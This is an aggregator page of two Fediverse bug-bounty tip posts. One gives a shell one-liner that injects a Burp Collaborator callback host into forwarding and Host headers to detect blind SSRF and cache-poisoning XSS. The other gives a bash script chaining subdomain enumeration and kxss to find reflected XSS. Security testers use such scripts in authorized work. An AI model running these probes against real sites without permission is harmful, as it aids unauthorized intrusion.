home.social

#httprobe — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #httprobe, aggregated by home.social.

  1. Checking for blind #SSRF in Headers & #XSS via cache poisoning

    cat urls.txt | assetfinder --subs-only| httprobe | while read url; do xss1=$(curl -s -L $url -H 'X-Forwarded-For: xss.burpcollaboratorhost'|grep xss) xss2=$(curl -s -L $url -H 'X-Forwarded-Host: xss.burpcollaboratorhost'|grep xss) xss3=$(curl -s -L $url -H 'Host: xss.burpcollaboratorhost'|grep xss) xss4=$(curl -s -L $url --request-target burpcollaboratorhost/ --max-time 2); echo -e "$url""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET xss.burpcollaboratorhostHTTP/1 ""\n";done\

    github.com/tomnomnom/assetfind
    github.com/tomnomnom/httprobe

    #bugbounty #bugbountytips #burpsuite #assetfinder #httprobe #blindinjection #owasp

  2. Simple Script for Finding Cross
    Site Scripting (XSS) vulns

    #!/bin/bash

    subfinder -d $1 -o domains_subfinder_$1
    amass enum --passive -d $1 -o domains_$1

    cat domains_subfinder_$1 | tee -a domain_$1
    cat domains_$1 | filter-resolved | tee -a domains_$1.txt

    cat domains_$1.txt | httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt

    github.com/projectdiscovery/su
    github.com/OWASP/Amass
    github.com/tomnomnom/hacks/tre
    github.com/tomnomnom/httprobe
    github.com/tomnomnom/waybackur
    github.com/tomnomnom/hacks/tre

    #bugbounty #bugbountytips #xss #subfinder #httprobe #waybackurls #kxss #amass